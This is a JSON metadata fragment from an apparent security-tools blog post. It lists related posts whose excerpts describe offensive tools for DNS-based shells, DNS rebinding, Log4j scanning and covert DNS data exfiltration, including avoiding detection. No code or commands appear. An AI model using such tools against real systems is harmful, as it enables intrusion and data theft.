Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":4229,"url":"https:\/\/kalilinuxtutorials.com\/dns-shell\/","url_meta":{"origin":14895,"position":0},"title":"DNS-Shell : An Interactive Shell Over DNS Channel","author":"R K","date":"March 16, 2019","format":false,"excerpt":"DNS-Shell is an interactive Shell over DNS channel. The server is Python based and can run on any operating system that has python installed, the payload is an encoded PowerShell command. The Payload is generated when the sever script is invoked and it simply utilizes nslookup to perform the queries\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":2784,"url":"https:\/\/kalilinuxtutorials.com\/singularity-dns-rebinding-attack\/","url_meta":{"origin":14895,"position":1},"title":"Singularity &#8211; A DNS Rebinding Attack Framework","author":"R K","date":"September 25, 2018","format":false,"excerpt":"Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine. It also ships with\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":22224,"url":"https:\/\/kalilinuxtutorials.com\/log4j-detect\/","url_meta":{"origin":14895,"position":2},"title":"Log4J-Detect : Script To Detect The &#8220;Log4j&#8221; Java Library Vulnerability For A List Of URLs With Multithreading","author":"R K","date":"February 28, 2022","format":false,"excerpt":"Log4J-Detect is a script \"log4j-detect.py\" developed in Python 3 is responsible for detecting whether a list of URLs are vulnerable to CVE-2021-44228. To do so, it sends a GET request using threads (higher performance) to each of the URLs in the specified list. The GET request contains a payload that\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiDuE2QUt5Aj8h5hvj9QAstBxsmeTmo02HNoKK5n0-Nb8DwvqyDfuFRySpdW2VMbYl5aAB9A4KB49Hh_BZjGXwlLFvz-kiIPVa6xX0vhQ-WJJWKMl77UOwktxs9JvjrVL48y_-5ev-phKRJ4PLZOtR_Cw3nsyUmxru8F2USkQc1QsG3wqeQm1Ua5WrO=s726","width":350,"height":200,"srcset":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiDuE2QUt5Aj8h5hvj9QAstBxsmeTmo02HNoKK5n0-Nb8DwvqyDfuFRySpdW2VMbYl5aAB9A4KB49Hh_BZjGXwlLFvz-kiIPVa6xX0vhQ-WJJWKMl77UOwktxs9JvjrVL48y_-5ev-phKRJ4PLZOtR_Cw3nsyUmxru8F2USkQc1QsG3wqeQm1Ua5WrO=s726 1x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiDuE2QUt5Aj8h5hvj9QAstBxsmeTmo02HNoKK5n0-Nb8DwvqyDfuFRySpdW2VMbYl5aAB9A4KB49Hh_BZjGXwlLFvz-kiIPVa6xX0vhQ-WJJWKMl77UOwktxs9JvjrVL48y_-5ev-phKRJ4PLZOtR_Cw3nsyUmxru8F2USkQc1QsG3wqeQm1Ua5WrO=s726 1.5x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiDuE2QUt5Aj8h5hvj9QAstBxsmeTmo02HNoKK5n0-Nb8DwvqyDfuFRySpdW2VMbYl5aAB9A4KB49Hh_BZjGXwlLFvz-kiIPVa6xX0vhQ-WJJWKMl77UOwktxs9JvjrVL48y_-5ev-phKRJ4PLZOtR_Cw3nsyUmxru8F2USkQc1QsG3wqeQm1Ua5WrO=s726 2x"},"classes":[]},{"id":21789,"url":"https:\/\/kalilinuxtutorials.com\/log4j-scan\/","url_meta":{"origin":14895,"position":3},"title":"log4j-Scan : A Fully Automated, Accurate &amp; Extensive Scanner For Finding Vulnerable log4j Hosts","author":"R K","date":"February 15, 2022","format":false,"excerpt":"log4j-scan is a fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts. Features Support for lists of URLs.Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools).Fuzzing for HTTP POST Data parameters.Fuzzing for JSON data parameters.Supports DNS callback for vulnerability discovery and\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiiQNl-AlRyYgcJJHOTvNwpj_rO55lk-zWzICr2oZM_i9fDpmYUk4DfVWkPIXR2j_cgL4U-NJ9VGQWIS0w4taQBOPUN2w8NZ0RA6LVbQz0IHEOLO-54zB_x9YHaBcs1qdA2BleK-LluPpEHUUxEKVc1eUwytyHHapSNrqP4kv7RyJNYiNLwxzEURYOe=s672","width":350,"height":200,"srcset":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiiQNl-AlRyYgcJJHOTvNwpj_rO55lk-zWzICr2oZM_i9fDpmYUk4DfVWkPIXR2j_cgL4U-NJ9VGQWIS0w4taQBOPUN2w8NZ0RA6LVbQz0IHEOLO-54zB_x9YHaBcs1qdA2BleK-LluPpEHUUxEKVc1eUwytyHHapSNrqP4kv7RyJNYiNLwxzEURYOe=s672 1x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiiQNl-AlRyYgcJJHOTvNwpj_rO55lk-zWzICr2oZM_i9fDpmYUk4DfVWkPIXR2j_cgL4U-NJ9VGQWIS0w4taQBOPUN2w8NZ0RA6LVbQz0IHEOLO-54zB_x9YHaBcs1qdA2BleK-LluPpEHUUxEKVc1eUwytyHHapSNrqP4kv7RyJNYiNLwxzEURYOe=s672 1.5x"},"classes":[]},{"id":12266,"url":"https:\/\/kalilinuxtutorials.com\/procrustes\/","url_meta":{"origin":14895,"position":4},"title":"Procrustes : Script To Automates The Exfiltration Of Data Over DNS","author":"R K","date":"March 15, 2021","format":false,"excerpt":"Procrustes is a bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked. The script currently supports sh, bash and powershell and is compatible with exec style command execution (e.g. java.lang.Runtime.exec).\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":14252,"url":"https:\/\/kalilinuxtutorials.com\/invoke-dnsteal\/","url_meta":{"origin":14895,"position":5},"title":"Invoke-DNSteal : Simple And Customizable DNS Data Exfiltrator","author":"R K","date":"July 9, 2021","format":false,"excerpt":"Invoke-DNSteal\u00a0is a Simple & Customizable DNS Data Exfiltrator. This tool helps you to exfiltrate data through DNS protocol over UDP and TCP, and lets you control the size of queries using random delay. Also, allows you to avoid detections by using random domains in each of your queries and you\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/14895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=14895"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/14895\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/16969"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=14895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=14895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=14895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}